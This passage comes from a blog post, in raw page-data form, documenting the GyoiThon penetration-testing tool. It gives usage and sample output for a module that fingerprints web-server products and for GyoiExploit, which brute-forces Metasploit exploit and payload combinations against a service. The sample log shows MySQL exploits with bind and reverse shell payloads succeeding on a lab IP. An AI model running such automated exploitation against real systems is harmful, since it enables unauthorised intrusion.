log&nbsp;&#8220;webconf.csv&#8221;&nbsp;gathered by GyoiThon or the log gathered by GyoiClassifier to identify products operated on the target server. Then, the product is identified using machine learning.<br><br>Usage (using webconf.csv)<br>GyoiClassifier identifies product name using webconf.csv.<br>local@client:~$ python GyoiClassifier.py -h<br>GyoiClassifier.py<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Usage:<\/h3>\n\n\n\n<p>&nbsp; &nbsp; GyoiClassifier.py (-t &lt;ip_addr&gt; | &#8211;target &lt;ip_addr&gt;) (-p &lt;port&gt; | &#8211;port &lt;port&gt;) (-v &lt;vhost&gt; | &#8211;vhost &lt;vhost&gt;) [(-u &lt;url&gt; | &#8211;url &lt;url&gt;)]<br>&nbsp; &nbsp; GyoiClassifier.py -h | &#8211;help<br><br><strong>Options:<\/strong><br>&nbsp; &nbsp;&nbsp;-t &#8211;target&nbsp; &nbsp;Require&nbsp; : IP address of target server.<br>&nbsp; &nbsp;&nbsp;-p &#8211;port&nbsp; &nbsp; &nbsp; &nbsp;Require&nbsp; : Port number of target server.<br>&nbsp; &nbsp;&nbsp;-v &#8211;vhost&nbsp; &nbsp; Require&nbsp; : Virtual Host of target server.<br>&nbsp; &nbsp;&nbsp;-u &#8211;url&nbsp; &nbsp; &nbsp; &nbsp; Optional : Full URL for direct access.<br>&nbsp; &nbsp;&nbsp;-h &#8211;help&nbsp;&nbsp;&nbsp;Optional : Show this screen and exit.<br><br>local@client:~$ python GyoiClassifier.py -t 192.168.220.148 -p 80 -v 192.168.220.148<\/p>\n\n\n\n<p><br>\u3000\u3000\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d<br>\u3000\u3000\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u3000\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d<br>\u3000\u3000\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u3000\u255a\u2550\u255d&nbsp; &nbsp; &nbsp;\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d<br><br>\u3000\u2588\u2588\u2557&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2588\u2557<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u255d&nbsp; \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551<br>\u3000\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d<br>\u3000\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d<br>\u3000 \u3000&nbsp; &nbsp;__&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; _<br>\u3000 \u3000&nbsp; \/ \/&nbsp; ___| |_( )__&nbsp; | |_| |__&nbsp; &nbsp;___&nbsp; _ __ | |_ __ _| | __<br>\u3000 \u3000 \/ \/&nbsp; \/ _ \\ __|\/ __| | __| &#8216;_ \\ \/ _ \\| &#8216;_ \\| __\/ _` | |\/ \/<br>\u3000 \u3000\/ \/__|&nbsp; __\/ |_ \\__ \\ | |_| | | | (_) | | | | || (_| |&nbsp; &nbsp;&lt;<br>\u3000 \u3000\\____\/\\___|\\__||___\/&nbsp; \\__|_| |_|\\___\/|_| |_|\\__\\__,_|_|\\_<br>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br>by GyoiClassifier.py<br><br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br>target&nbsp; &nbsp; &nbsp;: 192.168.220.148(192.168.220.148):80<br>target log : &#8220;gyoithon root path&#8221;..\/gyoithon\\get_192.168.220.148_80_ip.log<br><br>[+] judge :<br>[-] category : web server<br>&nbsp; &nbsp; product&nbsp; : unknown<br>&nbsp; &nbsp; too low maximum probability.<br>[-] category : framework<br>&nbsp; &nbsp; product&nbsp; : unknown<br>&nbsp; &nbsp; too low maximum probability.<br>[-] category : cms<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 1<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: heartcore<br>&nbsp; &nbsp; probability : 6.8966 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: PHPSESSID=44ec9b66c633a7abc374e5f9a4ad4be3&#8217;, &#8216;Set-Cookie:&nbsp; PHPSESSID=b1f9a2c2be74f3b3507d5cbb8ea78c75&#8217;]]<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 2<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: oscommerce<br>&nbsp; &nbsp; probability : 6.8966 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: PHPSESSID=44ec9b66c633a7abc374e5f9a4ad4be3&#8217;, &#8216;Set-Cookie: PHPSESSID=b1f9a2c2be74f3b3507d5cbb8ea78c75&#8217;]]<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 3<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: joomla<br>&nbsp; &nbsp; probability : 6.6667 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: PHPSESSID=44ec9b66c633a7abc374e5f9a4ad4be3&#8217;, &#8216;Set-Cookie: PHPSESSID=b1f9a2c2be74f3b3507d5cbb8ea78c75&#8217;]]<br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br><br>[+] done GyoiClassifier.py<br>GyoiClassifier.py finish!!<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Usage (using self-gathered log)<\/h3>\n\n\n\n<p><br>GyoiClassifier identifies product name using self-gathered log.<br><br>local@client:~$ python GyoiClassifier.py -t 192.168.220.129 -p 80 -v www.example.com -u http:\/\/www.example.com\/<br><br>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br>\u3000\u3000\u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557&nbsp; \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u3000\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d<br>\u3000\u3000\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u3000\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d<br>\u3000\u3000\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u3000\u255a\u2550\u255d&nbsp; &nbsp; &nbsp;\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d<br><br>\u3000\u2588\u2588\u2557&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2557&nbsp; &nbsp;\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2557&nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2588\u2557<br>\u3000\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u255d&nbsp; \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551<br>\u3000\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551&nbsp; \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d<br>\u3000\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d<br>\u3000\u3000&nbsp; &nbsp;__&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;<br>\u3000\u3000&nbsp; \/ \/&nbsp; ___| |_( )__&nbsp; | |_| |__&nbsp; &nbsp;___&nbsp; _ __ | |_ __ _| | __<br>\u3000\u3000 \/ \/&nbsp; \/ _ \\ __|\/ __| | __| &#8216;_ \\ \/ _ \\| &#8216;_ \\| __\/ _` | |\/ \/<br>\u3000\u3000\/ \/__|&nbsp; __\/ |_ \\__ \\ | |_| | | | (_) | | | | || (_| |&nbsp; &nbsp;&lt;<br>\u3000\u3000\\____\/\\___|\\__||___\/&nbsp; \\__|_| |_|\\___\/|_| |_|\\__\\__,_|_|\\_<br>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br>by GyoiClassifier.py<br><br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br>target&nbsp; &nbsp; &nbsp;: http:\/\/www.example.com\/<br>target log : not use<br><br>[+] judge :<br>[-] category : web server<br>&nbsp; &nbsp; product&nbsp; : unknown<br>&nbsp; &nbsp; too low maximum probability.<br>[-] category : framework<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 1<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: php<br>&nbsp; &nbsp; probability : 66.6667 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: f00e68432b68050dee9abe33c389831e=a3daf0eba60a5f11c95e4563c4eccebe&#8217;]]<br>[-] category : cms<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 1<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: joomla<br>&nbsp; &nbsp; probability : 13.3333 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: f00e68432b68050dee9abe33c389831e=a3daf0eba60a5f11c95e4563c4eccebe; path=\/&#8217;], [&#8216;Set-Cookie: f00e68432b68050dee9abe33c389831e=a3daf0eba60a5f11c95e4563c4eccebe&#8217;], [&#8216;Joomla!&#8217;]]<br>&nbsp; &nbsp; &#8212;&#8211;<br>&nbsp; &nbsp; ranking 2<br>&nbsp; &nbsp; product&nbsp; &nbsp; &nbsp;: heartcore<br>&nbsp; &nbsp; probability : 6.8966 %<br>&nbsp; &nbsp; reason&nbsp; &nbsp; &nbsp; : [[&#8216;Set-Cookie: f00e68432b68050dee9abe33c389831e=a3daf0eba60a5f11c95e4563c4eccebe&#8217;]]<br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br><br>[+] done GyoiClassifier.py<br>GyoiClassifier.py finish!!<br><br><strong>option required description<\/strong><br>-t, &#8211;target yes IP address of target server.<br>-p, &#8211;port yes Target port number.<br>-v, &#8211;vhost yes Virtual host of target server. If target server hasn&#8217;t virtual host, you indicate IP address.<br>-u, &#8211;url no URL of target server. If you want to gather newly logs of any server, indicate url of target server.<br><br><strong>GyoiExploit.py<\/strong><br><strong><br><\/strong>You can execute exploits thoroughly using all combinations of &#8220;Exploit module&#8221;, &#8220;Target&#8221; and &#8220;Payload&#8221; of Metasploit corresponding to user&#8217;s indicated product name and port number.<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Usage<\/h3>\n\n\n\n<p><br>local@client:~$ python GyoiExploit.py -h<br>GyoiExploit.py<br>Usage:<br>&nbsp; &nbsp; GyoiExploit.py (-t &lt;ip_addr&gt; | &#8211;target &lt;ip_addr&gt;) (-p &lt;port&gt; | &#8211;port &lt;port&gt;) (-s &lt;service&gt; | &#8211;service &lt;service&gt;)<br>&nbsp; &nbsp; GyoiExploit.py -h | &#8211;help<br><br>Options:<br>&nbsp; &nbsp; -t &#8211;target&nbsp; &nbsp;Require&nbsp; : IP address of target server.<br>&nbsp; &nbsp; -p &#8211;port&nbsp; &nbsp; &nbsp;Require&nbsp; : Port number of target server.<br>&nbsp; &nbsp; -s &#8211;service&nbsp; Require&nbsp; : Service name (product name).<br>&nbsp; &nbsp; -h &#8211;help&nbsp; &nbsp; &nbsp;Optional : Show this screen and exit.<br><br>local@client:~$ python GyoiExploit.py -t 192.168.220.145 -p 3306 -s mysql<br><br>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br>&nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557&nbsp; \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557&nbsp; &nbsp; &nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2557<br>&nbsp; \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2551\u2588\u2588\u2551<br>&nbsp; \u2588\u2588\u2588\u2588\u2588\u2557&nbsp; &nbsp;\u255a\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551\u2588\u2588\u2551<br>&nbsp; \u2588\u2588\u2554\u2550\u2550\u255d&nbsp; &nbsp;\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551&nbsp; &nbsp;\u255a\u2550\u255d\u255a\u2550\u255d<br>&nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2554\u255d \u2588\u2588\u2557\u2588\u2588\u2551&nbsp; &nbsp; &nbsp;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2551&nbsp; &nbsp;\u2588\u2588\u2557\u2588\u2588\u2557<br>&nbsp; \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d&nbsp; \u255a\u2550\u255d\u255a\u2550\u255d&nbsp; &nbsp; &nbsp;\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d&nbsp; &nbsp;\u255a\u2550\u255d&nbsp; &nbsp;\u255a\u2550\u255d\u255a\u2550\u255d<br>\u3000&nbsp; &nbsp;__&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; _&nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_&nbsp; &nbsp; &nbsp; &nbsp; _<br>\u3000&nbsp; \/ \/&nbsp; ___| |_( )__&nbsp; | |_| |__&nbsp; &nbsp;___&nbsp; _ __ | |_ __ _| | __<br>\u3000 \/ \/&nbsp; \/ _ \\ __|\/ __| | __| &#8216;_ \\ \/ _ \\| &#8216;_ \\| __\/ _` | |\/ \/<br>\u3000\/ \/__|&nbsp; __\/ |_ \\__ \\ | |_| | | | (_) | | | | || (_| |&nbsp; &nbsp;&lt;<br>\u3000\\____\/\\___|\\__||___\/&nbsp; \\__|_| |_|\\___\/|_| |_|\\__\\__,_|_|\\_<br>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br>by GyoiExploit.py<br><br>[+] Get exploit list.<br>[*] Loading exploit list from local file: C:\\Users\\i.takaesu\\Documents\\GitHub\\GyoiThon\\classifier4gyoithon\\data\\exploit_list.csv<br>[+] Get exploit tree.<br>[*] Loading exploit tree from local file: C:\\Users\\i.takaesu\\Documents\\GitHub\\GyoiThon\\classifier4gyoithon\\data\\exploit_tree.json<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 0, payload: generic\/custom, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 0, payload: generic\/debug_trap, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 0, payload: generic\/shell_bind_tcp, result: bingo!!<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 0, payload: generic\/shell_reverse_tcp, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 0, payload: generic\/tight_loop, result: failure<br><br>&#8230;snip&#8230;<br><br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 1, payload: linux\/x86\/shell_bind_tcp_random_port, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_getname, target: 1, payload: linux\/x86\/shell_reverse_tcp, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_hello, target: 0, payload: generic\/custom, result: failure<br>[*] exploit\/linux\/mysql\/mysql_yassl_hello, target: 0, payload: generic\/debug_trap, result: bingo!!<br>[*] exploit\/linux\/mysql\/mysql_yassl_hello, target: 0, payload: generic\/shell_bind_tcp, result: failure<br><br>&#8230;snip&#8230;<br><br><strong>option required description<\/strong><br>-t, &#8211;target yes IP address of target server.<br>-p, &#8211;port yes Target port number.<br>-s, &#8211;service yes Target service name identifiable by Metasploit.<br><br>If you want to change &#8220;exploit module&#8221; options, please refer this section [3. How to change &#8220;Exploit module&#8217;s option&#8221;].<br><br><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Operation check environment<\/h3>\n\n\n\n<ol class=\"wp-block-list\" type=\"1\">\n<li><strong>Kali Linux 2017.3 (for Metasploit)<\/strong><\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Memory: 8.0GB<\/li>\n\n\n\n<li>Metasploit Framework 4.16.15-dev<\/li>\n<\/ul>\n\n\n\n<p>&nbsp; &nbsp; &nbsp;<strong>2. Ubuntu 16.04 LTS (Host OS)<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CPU: Intel(R) Core(TM) i5-5200U 2.20GHz<\/li>\n\n\n\n<li>Memory: 8.0GB<\/li>\n\n\n\n<li>Python 3.6.1\uff08Anaconda3\uff09<\/li>\n\n\n\n<li>docopt 0.6.2<\/li>\n\n\n\n<li>jinja2 2.10<\/li>\n\n\n\n<li>msgpack-python 0.4.8<\/li>\n\n\n\n<li>pandas 0.20.3<\/li>\n<\/ul>\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><img decoding=\"async\" src=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/Main-page-1-300x60.png\" alt=\"\" class=\"wp-image-255\" title=\"Download\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/github.com\/gyoisamurai\/GyoiThon\/archive\/master.zip\" target=\"_blank\" rel=\"noreferrer noopener\">Download GyoiThon<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software, Framework, Programming Language etc,. And, it can&nbsp;execute exploit&#8230;<\/p>\n","protected":false},"author":1,"featured_media":6358,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,25],"tags":[78,79],"class_list":{"0":"post-248","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-utilities","8":"category-vapt","9":"tag-utilities","10":"tag-vapt"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity<\/title>\n<meta name=\"description\" content=\"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" 